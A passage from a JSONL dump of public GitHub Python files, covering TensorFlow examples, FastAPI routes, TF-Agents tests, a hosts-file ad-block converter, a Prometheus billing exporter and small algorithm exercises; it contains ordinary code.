'b-', label='L2 Loss')\n# plt.plot(x_array, l1_y_out, 'r--', label='L1 Loss')\n# plt.plot(x_array, phuber1_y_out, 'k-.', label='P-Huber Loss (0.25)')\n# plt.plot(x_array, phuber2_y_out, 'g:', label='P-Huber Loss (5.0)')\n# plt.ylim(-0.2, 0.4)\n# plt.legend(loc='lower right', prop={'size': 11})\n# plt.show()\n\n\n\n# part2\nx_array = sess.run(x_vals)\nplt.plot(x_array, hinge_y_out, 'b-', label='Hinge Loss')\nplt.plot(x_array, xentropy_y_out, 'r--', label='Cross-entropy loss')\nplt.plot(x_array, xentropy_sigmoid_out, 'k-.', label='Cross-entropy sigmoid loss')\nplt.plot(x_array, xentropy_weighted_y_out, 'g:', label='Weighted Cross-entropy loss')\nplt.ylim(-1.5, 3)\nplt.legend(loc='lower right', prop={'size': 11})\nplt.show()\n\n\n\n\n\n","repo_name":"skylinebin/Machine-Learning-Notes","sub_path":"Tensorflow/TensorflowWithCookbook/MachineLearningThree.py","file_name":"MachineLearningThree.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23076712884","text":"def ns(f):\n return next(f).strip()\n\n\nwith open(\"../testset/duplicate_combinations/test1.txt\", 'r') as f:\n n, m, M = map(int, ns(f).split())\n a = list(map(int, ns(f).split()))\n\ndp = [[1] + [0] * m for _ in range(n + 1)]\n\nfor i in range(n):\n for j in range(1, m + 1):\n if j - 1 - a[i] >= 0:\n dp[i + 1][j] = (dp[i + 1][j - 1] + dp[i][j] - dp[i][j - 1 - a[i]] + M) % M\n else:\n dp[i + 1][j] = (dp[i + 1][j - 1] + dp[i][j]) % M\nprint(dp[n][m])\n","repo_name":"e5pe0n/algorithm-training","sub_path":"Ant/chapter2/python/duplicate_combinations.py","file_name":"duplicate_combinations.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33675754138","text":"from fastapi import APIRouter\nfrom fastapi.encoders import jsonable_encoder\nfrom pymongo import message\nfrom database.db import UserSchema,UserDB\nfrom routers.utils import ResponseModel, ErrorResponseModel\n\nrouter = APIRouter()\nuser_col = UserDB()\n\n#CREATE\n@router.post(\"/users/\")\nasync def api_add_user(data: UserSchema) -> dict:\n \"\"\"\n Add user to db\n \"\"\"\n data = jsonable_encoder(data)\n new_user = user_col.add_user(data)\n if new_user:\n message = \"add success\"\n code = 201\n return ResponseModel(new_user, code, message)\n return ErrorResponseModel(\"Faild\", 404)\n\n#READ\n@router.get(\"/users/{uid}\")\nasync def api_get_user_info(uid : str) -> dict:\n \"\"\"\n Get user from db\n \"\"\"\n user = user_col.get_user_info(uid)\n if user:\n message = \"Success\"\n code = 200\n return ResponseModel(user, code, message)\n return ErrorResponseModel(\"Faild\", 404)\n\n#UPDATE\n@router.put(\"/users/{uid}\")\nasync def api_update_user(uid: str, data: UserSchema) -> dict:\n \"\"\"\n Update user in db\n \"\"\"\n data = jsonable_encoder(data)\n is_update = user_col.update_user(uid,data)\n if is_update:\n message = \"Update Success\"\n code = 200\n return ResponseModel(is_update, code, message)\n return ErrorResponseModel(\"Faild\", 404)\n\n#DELETE\n@router.delete(\"/users/{uid}\")\nasync def api_del_user(uid: str) -> dict:\n \"\"\"\n Delete user in db\n \"\"\"\n is_del = user_col.del_user(uid)\n if is_del:\n message = \"Delete Success\"\n code = 200\n return ResponseModel(is_del, code, message)\n return ErrorResponseModel(\"Faild\",404)\n\n\n","repo_name":"phuthu19112000/demovfrandsize","sub_path":"routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14296561052","text":"# This is a comment this line will not be interpeted\n\n\"\"\"\nThis is \na multi-line Comment\nwil not be interpreted\n\"\"\"\n# How to declare Variables\n# in JavaScript: var variableName = value\n\n# python is snake we are going to use snake_case_naming_convention\n\nvariable_name = \"value\"\n\nGLOBAL_VARIABLE = \"python\"\n\nPORT = 5000\nAPP_NAME = \"WEB_APP\"\n\n# DATA TYPES\n\n#* Primetives\n #* String\nfirst_str =\"hello world\"\nname=\"John\"\n #* Numbers\n #*integers\nage = 41\n #*Floats\nbmi = 2.75\n #*Boolean\nvoted = True\nis_admin= False\n #* NoneType\npermit = None\n\n# print(name, age, bmi, is_admin)\n\n# print(f\"User name: {name} his {age} years and his BMI equal to {bmi}\")\n\n# print(f\"USER : {name} \\nBMI : {bmi}\")\n\n# print(\"FORMAT ** User name: {} his {} years and his BMI equal to {}\" .format(name, age, bmi))\n\n# print(f\"None :{type(permit)}\\nName : {type(name)} \\nAge :{type(age)} \\nBMI : {type(bmi)} \\nADMIN : {type(is_admin)}\")\n\nstr_age = str(age)\nfloat_age = float(age)\n# print(f\"AGE : {type(age)} \\nSTR_AGE {type(str_age)} \\nFLOAT_AGE{type(float_age)} {float_age}\")\n\n# print(len(name), name.upper(), first_str.split(' '))\n\n\n# * COMPLEX LISTS\n\n# Array in JavaScript == List in Python\n# INDEX 0------->len(list)-1\n\nmy_list = [1,2,3,\"45\",4,5, name, age, is_admin, bmi, [\"yes\", \"no\", None]]\n\n# print(my_list[0])\n\n# print(my_list[0:5])\n\n# print(my_list)\n# my_list.append(first_str)\n# print(my_list)\n# my_list.pop()\n# print(my_list)\n# my_list.pop(-2)\n\n# numbers = [2,0,22,5,-11,100]\n# numbers.sort(reverse=True)\n# print(numbers)\n\n# * COMPLEX JavaScript OBJECTS = (PYTHON Dictionaries)\n# * Key-Value PAIRS\nuser = {\n 'first_name' : name,\n 'last-name' : \"smith\",\n 'age' : age,\n 'is_admin' : False,\n 'marks' : [10,9,8,10],\n 'friends' : {'one' : \"Alex\" , 'two' : \"Max\"}\n}\n\n# bracker notation\nprint(user[\"first_name\"])\n# .get Notation\nprint(user.get(\"is_admin\"))\n\nuser[\"is_admin\"] = True\nprint(user)\n\n# * Tuples ( Similar to lists BUT immutable : Can NOT be changed)\n\nmy_tuple =(1,2,3)\nmy_tuple.append(4)\n\n# * SR\nmy_set = {1,2,2,3,4,5,5,6,\"john\",\"john\"}\nprint(my_set)","repo_name":"wissemlabidi/python-stack","sub_path":"01-python-fundamentals/01_data_types.py","file_name":"01_data_types.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31157330408","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom absl.testing import parameterized\nimport numpy as np\nimport tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import\n\nfrom tf_agents.agents.ddpg import actor_network\nfrom tf_agents.environments import random_py_environment\nfrom tf_agents.policies import actor_policy\nfrom tf_agents.policies import policy_saver\nfrom tf_agents.policies import py_tf_eager_policy\nfrom tf_agents.policies import random_tf_policy\nfrom tf_agents.specs import array_spec\nfrom tf_agents.specs import tensor_spec\nfrom tf_agents.trajectories import time_step as ts\nfrom tf_agents.utils import common\nfrom tf_agents.utils import nest_utils\nfrom tf_agents.utils import test_utils\n\n\nclass PyTFEagerPolicyTest(test_utils.TestCase):\n\n def testPyEnvCompatible(self):\n if not common.has_eager_been_enabled():\n self.skipTest('Only supported in eager.')\n\n observation_spec = array_spec.ArraySpec([2], np.float32)\n action_spec = array_spec.BoundedArraySpec([1], np.float32, 2, 3)\n\n observation_tensor_spec = tensor_spec.from_spec(observation_spec)\n action_tensor_spec = tensor_spec.from_spec(action_spec)\n time_step_tensor_spec = ts.time_step_spec(observation_tensor_spec)\n\n actor_net = actor_network.ActorNetwork(\n observation_tensor_spec,\n action_tensor_spec,\n fc_layer_params=(10,),\n )\n\n tf_policy = actor_policy.ActorPolicy(\n time_step_tensor_spec, action_tensor_spec, actor_network=actor_net)\n\n py_policy = py_tf_eager_policy.PyTFEagerPolicy(tf_policy)\n # Env will validate action types automaticall since we provided the\n # action_spec.\n env = random_py_environment.RandomPyEnvironment(observation_spec,\n action_spec)\n\n time_step = env.reset()\n\n for _ in range(100):\n action_step = py_policy.action(time_step)\n time_step = env.step(action_step.action)\n\n def testRandomTFPolicyCompatibility(self):\n if not common.has_eager_been_enabled():\n self.skipTest('Only supported in eager.')\n\n observation_spec = array_spec.ArraySpec([2], np.float32)\n action_spec = array_spec.BoundedArraySpec([1], np.float32, 2, 3)\n\n observation_tensor_spec = tensor_spec.from_spec(observation_spec)\n action_tensor_spec = tensor_spec.from_spec(action_spec)\n time_step_tensor_spec = ts.time_step_spec(observation_tensor_spec)\n\n tf_policy = random_tf_policy.RandomTFPolicy(time_step_tensor_spec,\n action_tensor_spec)\n\n py_policy = py_tf_eager_policy.PyTFEagerPolicy(tf_policy)\n env = random_py_environment.RandomPyEnvironment(observation_spec,\n action_spec)\n time_step = env.reset()\n\n for _ in range(100):\n action_step = py_policy.action(time_step)\n time_step = env.step(action_step.action)\n\n\nclass SavedModelPYTFEagerPolicyTest(test_utils.TestCase,\n parameterized.TestCase):\n\n def setUp(self):\n super(SavedModelPYTFEagerPolicyTest, self).setUp()\n if not common.has_eager_been_enabled():\n self.skipTest('Only supported in eager.')\n\n observation_spec = array_spec.ArraySpec([2], np.float32)\n self.action_spec = array_spec.BoundedArraySpec([1], np.float32, 2, 3)\n self.time_step_spec = ts.time_step_spec(observation_spec)\n\n observation_tensor_spec = tensor_spec.from_spec(observation_spec)\n action_tensor_spec = tensor_spec.from_spec(self.action_spec)\n time_step_tensor_spec = tensor_spec.from_spec(self.time_step_spec)\n\n actor_net = actor_network.ActorNetwork(\n observation_tensor_spec,\n action_tensor_spec,\n fc_layer_params=(10,),\n )\n\n self.tf_policy = actor_policy.ActorPolicy(\n time_step_tensor_spec, action_tensor_spec, actor_network=actor_net)\n\n def testSavedModel(self):\n\n path = os.path.join(self.get_temp_dir(), 'saved_policy')\n saver = policy_saver.PolicySaver(self.tf_policy)\n saver.save(path)\n\n eager_py_policy = py_tf_eager_policy.SavedModelPyTFEagerPolicy(\n path, self.time_step_spec, self.action_spec)\n rng = np.random.RandomState()\n sample_time_step = array_spec.sample_spec_nest(self.time_step_spec, rng)\n batched_sample_time_step = nest_utils.batch_nested_array(sample_time_step)\n\n original_action = self.tf_policy.action(batched_sample_time_step)\n unbatched_original_action = nest_utils.unbatch_nested_tensors(\n original_action)\n original_action_np = tf.nest.map_structure(lambda t: t.numpy(),\n unbatched_original_action)\n saved_policy_action = eager_py_policy.action(sample_time_step)\n\n tf.nest.assert_same_structure(saved_policy_action.action, self.action_spec)\n\n np.testing.assert_array_almost_equal(original_action_np.action,\n saved_policy_action.action)\n\n @parameterized.parameters(None, 0, 100, 200000)\n def testGetTrainStep(self, train_step):\n path = os.path.join(self.get_temp_dir(), 'saved_policy')\n if train_step is None:\n # Use the default argument, which should set the train step to be -1.\n saver = policy_saver.PolicySaver(self.tf_policy)\n expected_train_step = -1\n else:\n saver = policy_saver.PolicySaver(\n self.tf_policy, train_step=tf.constant(train_step))\n expected_train_step = train_step\n saver.save(path)\n\n eager_py_policy = py_tf_eager_policy.SavedModelPyTFEagerPolicy(\n path, self.time_step_spec, self.action_spec)\n\n self.assertEqual(expected_train_step, eager_py_policy.get_train_step())\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"awilliea/Risk-based_RL_for_Optimal_Trading_Execution","sub_path":"tf_agents/policies/py_tf_eager_policy_test.py","file_name":"py_tf_eager_policy_test.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"37541321709","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\n__author__ = 'ballessay'\n\nfrom glob import glob\nimport os\nimport sys\nimport getopt\n\n################################################################################\n# sources must be manually downloaded cause automation is forbidden by most\n# of the services\n#\n# http://winhelp2002.mvps.org/hosts.txt\n# http://hosts-file.net/download/hosts.txt\n# http://pgl.yoyo.org/adservers/serverlist.php?hostformat=dnsmasq&showintro=0&mimetype=plaintext\n# http://someonewhocares.org/hosts/hosts\n#\n# manual download helper script: DownloadHostsFiles.sh\n\n\n# Some input hosts files are a bit too restrictive. So the entries in\n# this list won't be included in the output file\n_url_filter = [\n \"blogspot.com\"\n]\n\n# output formats\n_dnsmasq_format = 'address=/{0}/127.0.0.1'.format\n_hosts_file_format = '127.0.0.1 {0}'.format\n_unbound_format = 'local-zone: \"{0}\" redirect\\nlocal-data: \"{0} A 127.0.0.1\"'.format\n\n\ndef relevant(line):\n \"\"\"\n Check if a line even needs to be considered for parsing\n :param line: to inspect\n :return: True/False\n \"\"\"\n return not line.startswith('#') and len(line) > 0 and not line.isspace()\n\n\ndef url_part(parts):\n \"\"\"\n Depending on the element count return the url/domain part in of the list\n :param parts: list with the parts of a split line as elements\n :return: domain name or None\n \"\"\"\n elements = len(parts)\n if elements > 1:\n return parts[1]\n elif elements > 0:\n return parts[0]\n return None\n\n\nclass HostsConverter:\n # info message per file\n _file_info = 'file: {0} has {1} lines, relevant: {2} split: {3} ' \\\n 'unfiltered lines {4}'.format\n\n # message string to display at the end of extraction\n _extract_msg = 'overall line count {0}\\nunique unfiltered ' \\\n 'domains: {1}'.format\n\n def __init__(self, path, output_format, output_file, print_stats):\n self._working_dir = path\n self._domains = set()\n self._line_count = 0\n self._output_format = output_format\n self._print_stats = print_stats\n self._output_file = output_file\n\n def convert(self):\n \"\"\"\n Convert/Merge all files in file_paths to one big host/dnsmasq file and\n output some statistics at the end\n \"\"\"\n print('working dir: {0}'.format(self._working_dir))\n\n file_paths = glob(os.path.join(self._working_dir, '*.hosts'))\n for filename in file_paths:\n self._parse_file(filename)\n\n self._write_file()\n\n if self._print_stats:\n print(self._extract_msg(self._line_count, len(self._domains)))\n\n def _write_file(self):\n \"\"\"\n Writes the collected DNS entries to an output file\n \"\"\"\n file_path = os.path.join(self._working_dir, self._output_file)\n with open(file_path, 'w') as output_file:\n for domain in self._domains:\n output_file.write(self._output_format(domain) + '\\n')\n output_file.close()\n\n def _parse_file(self, file_path):\n \"\"\"\n Parse one file for domain names and output some file statistics\n :param file_path: path to the input file\n \"\"\"\n line_count = 0\n relevant_lines = 0\n url_count = 0\n added_urls = 0\n\n with open(file_path, 'r') as input_file:\n for line in input_file:\n line_count += 1\n if relevant(line):\n relevant_lines += 1\n url = url_part(line.split())\n if url:\n url_count += 1\n if url not in _url_filter:\n added_urls += 1\n self._domains.add(url)\n\n if self._print_stats:\n print(self._file_info(file_path, line_count, relevant_lines,\n url_count, added_urls))\n\n self._line_count += line_count\n input_file.close()\n\n\ndef usage():\n # TODO: print nice formatted usage information\n print('Usage: {0}'.format(os.path.basename(sys.argv[0])))\n print('Options:')\n print('-h, --help shows this information')\n print('-o, --output filename sets the name of the output file. default: ' \\\n 'hosts_out')\n print('-p, --path working dir. default: cwd/pwd')\n print('-f, --format output file format. possible: hosts, dnsmasq, unbound' \\\n ' default: dnsmasq')\n print('-s, --stats shows some file statistics')\n\n\ndef main(argv):\n path = os.getcwd()\n format_type = 'dnsmasq'\n output_format = _dnsmasq_format\n output_file = \"hosts.out\"\n print_stats = False\n\n _options_short = 'ho:p:f:s'\n _options_long = ['help', 'output=', 'path=', 'format=', 'stats']\n\n try:\n opts, args = getopt.getopt(argv, _options_short, _options_long)\n except getopt.GetoptError as err:\n print(err.message)\n usage()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit()\n elif opt in ('-o', '--output'):\n output_file = arg\n elif opt in ('-p', '--path'):\n path = arg\n elif opt in ('-f', '--format'):\n format_type = arg\n elif opt in ('-s', '--stats'):\n print_stats = True\n\n formats = {'hosts': _hosts_file_format, 'dnsmasq': _dnsmasq_format, 'unbound': _unbound_format}\n if format_type in formats.keys():\n output_format = formats[format_type]\n else:\n usage()\n sys.exit(3)\n\n converter = HostsConverter(path, output_format, output_file, print_stats)\n converter.convert()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"ballessay/hostsfileconverter","sub_path":"HostsFileConverter.py","file_name":"HostsFileConverter.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35676417517","text":"# Given an array of integers, return indices of the two numbers such that they add up to a specific target.\n#\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n#\n# Example:\n# Given nums = [2, 7, 11, 15], target = 9,\n#\n# Because nums[0] + nums[1] = 2 + 7 = 9,\n# return [0, 1].\n\ndef twoSum(nums,target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n since we may not use the same element twice, so at most we could loop the list one time.\n foreach element we need to know if there is another element exist in the list can sum up to target.\n we can't have the second loop to sum therefor each element will be use n-1 times.\n so we switch to use a Dict which the key is the element itself,and value is the index.\n and we just need to check if the dict contains the key(target -nums[i]).\n \"\"\"\n dict = {}\n for index in range(len(nums)):\n if target - nums[index] in dict:\n perv = dict[target - nums[index]]\n return [perv,index]\n else:\n dict[nums[index]] = index\n\nprint(twoSum([2,7,11,15],9))\n","repo_name":"paulhzq/leetcode","sub_path":"1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69946775273","text":"\"\"\"\r\nHW3: preprocess\r\nYuwei Zhang\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef create_outcome(df, post_col, funded_col, interval_col, outcome_col, period):\r\n '''\r\n Define the outcome column\r\n :param df: a data frame\r\n :param post_col: (str) the name of the posted date\r\n :param funded_col: (str) the name of the funded date\r\n :param interval_col: (str) the name of the interval\r\n :param outcome_col: (str) the name of the outcome column\r\n :param period: (timedelta object) the period that the project receive funding\r\n\r\n :return: No returns but add three two columns\r\n '''\r\n\r\n df[post_col] = pd.to_datetime(df[post_col])\r\n df[funded_col] = pd.to_datetime(df[funded_col])\r\n df[interval_col] = df[funded_col] - df[post_col]\r\n df[outcome_col] = np.where(df[interval_col] <= period, 1, 0)\r\n\r\n\r\ndef imputation(df, colnames, is_num=True):\r\n '''\r\n imputate the cells that are NaN with intended value. If it is numeric, then\r\n imputating value is its mean, else it would be 'unknown'.\r\n :param df: a data frame\r\n :param colnames:(list) a list of colnames to be imputated\r\n :param is_num: (bool) check whether those columns are numeric or not\r\n\r\n :return: No returns.\r\n '''\r\n\r\n for colname in colnames:\r\n if is_num:\r\n impute_val = df[colname].mean()\r\n else:\r\n impute_val = 'unknown'\r\n\r\n df[colname] = df[colname].fillna(value=impute_val)\r\n\r\n\r\ndef discritize(df, colname, bins_list, labels_list):\r\n '''\r\n Discritize the continuous variable\r\n Inputs:\r\n df: a data frame\r\n colname: the name of the column\r\n bins_list: the list of the boundaries to be cut\r\n labels_list: the label of\r\n Output:\r\n add a new column that are discritized from a continuous variable\r\n '''\r\n df[(colname + '_category')] = pd.cut(df[colname],\r\n bins=bins_list,\r\n labels=labels_list,\r\n include_lowest=True, right=False)\r\n\r\n\r\ndef get_dummies(df, colname):\r\n '''\r\n Convert the categorical variable into dummies\r\n Inputs:\r\n df: a data frame\r\n colname: the name of the colname\r\n Return:\r\n the data frame with those dummies into data frame\r\n '''\r\n return pd.concat([df,pd.get_dummies(df[colname])], axis=1)\r\n","repo_name":"haonen/CAPP30254","sub_path":"HW3/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44299667040","text":"import requests\nimport json\nimport sys\nimport os\nfrom flask import Flask\nfrom flask import jsonify\n\nprometheus_url = os.getenv('PROMETHEUS_URL', 'http://localhost:9090')\n\napp = Flask(__name__)\n\ndef doquery(query):\n response = requests.get(prometheus_url + '/api/v1/query', params={'query': query})\n content_json = json.loads(response.content)\n\n if len(content_json['data']['result']) == 0:\n content_json = 0\n\n return content_json\n\ndef genflowJSON(flow, clientid,\n processor_cpu_total, processor_memory_total, processor_plans,\n flink_cpu_total, flink_memory_total, flink_plans,\n collector_retentions, collector_plans, collector_bytes,\n emitter_plans, emitter_bytes):\n root = {}\n collector = {}\n processor = {}\n flink = {}\n emitter = {}\n\n root['name'] = flow\n root['clientid'] = clientid\n root['collector'] = collector\n root['emitter'] = emitter\n root['processor'] = processor\n root['flink'] = flink\n\n collector['plans'] = collector_plans\n collector['network_bytes'] = collector_bytes\n collector['retentions'] = collector_retentions\n\n processor['plans'] = processor_plans\n processor['cpu'] = processor_cpu_total\n processor['memory'] = processor_memory_total\n\n flink['plans'] = flink_plans\n flink['cpu'] = flink_cpu_total\n flink['memory'] = flink_memory_total\n\n emitter['plans'] = emitter_plans\n emitter['network_bytes'] = emitter_bytes\n\n jsonstr = json.dumps(root)\n return jsonstr\n\ndef genflowsJSON(json_flows):\n root = {}\n flows = []\n\n for flow in json_flows['data']['result']:\n flows.append(flow['metric']['flow_namespace'])\n\n root['flows'] = flows\n jsonstr = json.dumps(root)\n return jsonstr\n\n@app.route('/')\ndef root():\n return \"Welcome to flowbillexporter!\"\n\n@app.route('/flow/')\ndef flows():\n q_flows = \"count by (flow_namespace)(count_over_time(flow_retention[1h]))\"\n data_flows = doquery(q_flows)\n jsonstr = genflowsJSON(data_flows)\n return jsonstr\n\n@app.route('/flow/')\ndef flow(flow):\n ### queries\n ## global\n # clientid\n q_clientid = \"flow_collector_input_limit{flow_namespace=\\\"%s\\\",rawValue!=''}[1h]\" % (flow)\n data_clientid = doquery(q_clientid)\n if data_clientid != 0:\n clientid = data_clientid['data']['result'][0]['metric']['clientId']\n else:\n return \"clientid not found\", 404\n\n ## collector\n # collector bytes\n q_collector_bytes = \"sum(increase(nginx_server_bytes{ns=\\\"%s\\\",host=~\\\".*collector.*\\\",direction=\\\"in\\\"}[1h]))\" % (flow)\n data_collector_bytes = doquery(q_collector_bytes)\n collector_bytes = 0\n\n if data_collector_bytes != 0:\n collector_bytes = data_collector_bytes['data']['result'][0]['value'][1]\n\n # collector retentions\n q_collector_retentions = \"sum by (rawValue)(count_over_time(flow_retention{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n data_collector_retentions = doquery(q_collector_retentions)\n\n collector_retentions = {}\n\n if data_collector_retentions != 0:\n for retention_plan in data_collector_retentions['data']['result']:\n collector_retentions.update({retention_plan['metric']['rawValue']: retention_plan['value'][1]})\n\n # collector plans #OK\n q_collector_plans = \"sum by (rawValue)(count_over_time(flow_collector_input_limit{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n data_collector_plans = doquery(q_collector_plans)\n collector_plans = {}\n for collector_plan in data_collector_plans['data']['result']:\n collector_plans.update({collector_plan['metric']['rawValue']: collector_plan['value'][1]})\n\n ## emitter\n # emitter network bytes\n q_emitter_network_bytes = \"sum(increase(nginx_server_bytes{ns=\\\"%s\\\",host=~\\\".*emiter.*\\\",direction=\\\"out\\\"}[1h]))\" % (flow)\n data_emitter_bytes = doquery(q_emitter_network_bytes)\n emitter_bytes = 0\n\n if data_emitter_bytes != 0:\n emitter_bytes = data_emitter_bytes['data']['result'][0]['value'][1]\n\n # emitter plans\n q_emitter_plans = \"sum by (rawValue)(count_over_time(flow_emitter_output_limit{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n data_emitter_plans = doquery(q_emitter_plans)\n emitter_plans = {}\n for emitter_plan in data_emitter_plans['data']['result']:\n emitter_plans.update({emitter_plan['metric']['rawValue']: emitter_plan['value'][1]})\n\n ## processor\n # processor cpu\n q_processor_cpu = \"sum(avg by (container_name)(rate(container_cpu_usage_seconds_total{namespace=\\\"%s\\\",container_name=~\\\"processor.*\\\"}[1h])))\" % (flow)\n data_processor_cpu = doquery(q_processor_cpu)\n processor_cpu_total = 0\n\n if data_processor_cpu != 0:\n processor_cpu_total = data_processor_cpu['data']['result'][0]['value'][1]\n\n # processor memory\n q_processor_memory = \"sum(avg_over_time(container_memory_usage_bytes{namespace=\\\"%s\\\",container_name=~\\\"processor.*\\\"}[1h] offset 1h)/1024/1024)\" % (flow)\n data_processor_memory = doquery(q_processor_memory)\n processor_memory_total = 0\n\n if data_processor_memory != 0:\n processor_memory_total = data_processor_memory['data']['result'][0]['value'][1]\n\n # processor plans\n processor_plans = {}\n processor_cpu_plans = {}\n processor_memory_plans = {}\n\n q_processor_cpu_plans = \"sum by (rawValue)(count_over_time(flow_processor_cpu_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n q_processor_memory_plans = \"sum by (rawValue)(count_over_time(flow_processor_memory_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n\n data_processor_cpu_plans = doquery(q_processor_cpu_plans)\n data_processor_memory_plans = doquery(q_processor_memory_plans)\n\n if data_processor_cpu_plans != 0 and data_processor_memory_plans != 0:\n for processor_cpu_plan in data_processor_cpu_plans['data']['result']:\n processor_cpu_plans.update({processor_cpu_plan['metric']['rawValue']: processor_cpu_plan['value'][1]})\n\n for processor_memory_plan in data_processor_memory_plans['data']['result']:\n processor_memory_plans.update({processor_memory_plan['metric']['rawValue']: processor_memory_plan['value'][1]})\n\n processor_plans['cpu'] = processor_cpu_plans\n processor_plans['memory'] = processor_memory_plans\n\n # flink cpu\n q_flink_cpu = \"sum(avg by (container_name)(rate(container_cpu_usage_seconds_total{namespace=\\\"%s\\\",container_name=~\\\"flink-taskmanager.*\\\"}[1h])))\" % (flow)\n data_flink_cpu = doquery(q_flink_cpu)\n flink_cpu_total = 0\n\n if data_flink_cpu != 0:\n flink_cpu_total = data_flink_cpu['data']['result'][0]['value'][1]\n\n # flink memory\n q_flink_memory = \"sum(avg_over_time(container_memory_usage_bytes{namespace=\\\"%s\\\",container_name=~\\\"flink-taskmanager.*\\\"}[1h] offset 1h)/1024/1024)\" % (flow)\n data_flink_memory = doquery(q_flink_memory)\n flink_memory_total = 0\n\n if data_flink_memory != 0:\n flink_memory_total = data_flink_memory['data']['result'][0]['value'][1]\n\n\t# flink plans\n flink_plans = {}\n flink_cpu_plans = {}\n flink_memory_plans = {}\n\n q_flink_cpu_plans = \"sum by (rawValue)(count_over_time(flow_flink_cpu_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n q_flink_memory_plans = \"sum by (rawValue)(count_over_time(flow_flink_memory_plan{flow_namespace=\\\"%s\\\"}[1h]))\" % (flow)\n\n data_flink_cpu_plans = doquery(q_flink_cpu_plans)\n data_flink_memory_plans = doquery(q_flink_memory_plans)\n\n if data_flink_cpu_plans != 0 and data_flink_memory_plans != 0:\n for flink_cpu_plan in data_flink_cpu_plans['data']['result']:\n flink_cpu_plans.update({flink_cpu_plan['metric']['rawValue']: flink_cpu_plan['value'][1]})\n\n for flink_memory_plan in data_flink_memory_plans['data']['result']:\n flink_memory_plans.update({flink_memory_plan['metric']['rawValue']: flink_memory_plan['value'][1]})\n\n flink_plans['cpu'] = flink_cpu_plans\n flink_plans['memory'] = flink_memory_plans\n\n # build json\n jsonstr = genflowJSON(flow, clientid, \n processor_cpu_total, processor_memory_total, processor_plans,\n flink_cpu_total, flink_memory_total, flink_plans,\n collector_retentions, collector_plans, collector_bytes, \n emitter_plans, emitter_bytes)\n\n return jsonstr\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","repo_name":"oktawave-code/horizon","sub_path":"flowbillexporter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5702898747","text":"def solution(lottos, win_nums):\n\n \n count = 0\n zeros = 0\n print(lottos)\n print(win_nums)\n for i in range(len(lottos)):\n num = lottos[i]\n if num == 0:\n zeros += 1\n for j in range(len(win_nums)):\n if num == win_nums[j]:\n count += 1\n\n answer = [count, count + zeros]\n answer[0] = 7 - (count+zeros) if (7-(count+zeros) < 7) else 6\n answer[1] = 7 - count if(7-count) < 7 else 6\n return answer","repo_name":"Kyuber1007/problemsolving","sub_path":"programmers/lottos.py","file_name":"lottos.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10838778649","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\n# Loading the dataset\ndataset = np.loadtxt(\"data.txt\", delimiter=',')\nprint(dataset.shape)\n\n# Visualizing the data\nplt.scatter(dataset[:, 0], dataset[:, -1])\nplt.title(\"Data points\")\nplt.xlabel(\"Size\")\nplt.ylabel(\"Price\")\nplt.show()\n\n# Splitting it into training and testing sets\nX_train, X_test, Y_train, Y_test = train_test_split(dataset[:, :-1], dataset[:, -1], test_size=0.3, random_state=1)\nY_train = Y_train.reshape(Y_train.shape[0], 1)\nY_test = Y_test.reshape(Y_test.shape[0], 1)\n\n# Preprocessing the data.\n# Mean normalisation and feature scaling.\ndef preprocess(X, mean=None, std=None):\n m, n = X.shape\n if mean is None and std is None:\n mean = np.mean(X, axis=0)\n std = np.std(X, axis=0)\n\n X = (X - mean) / std\n return X, mean, std\n else:\n X = (X - mean) / std\n return X\n\nX_train, mean, std = preprocess(X_train)\nX_test = preprocess(X_test, mean, std)\n\n# Some useful values\nm, n = X_train.shape\nprint(\"Number of training examples:\", m)\nprint(\"Number of features:\", n)\n\n# TensorFlow Time!\n\n# Creating placeholders for the inputs\nX = tf.placeholder(tf.float32, [None, n], name='X')\nY = tf.placeholder(tf.float32, [None, 1], name='Y')\n\n# Creating variables to hold the parameters\nW = 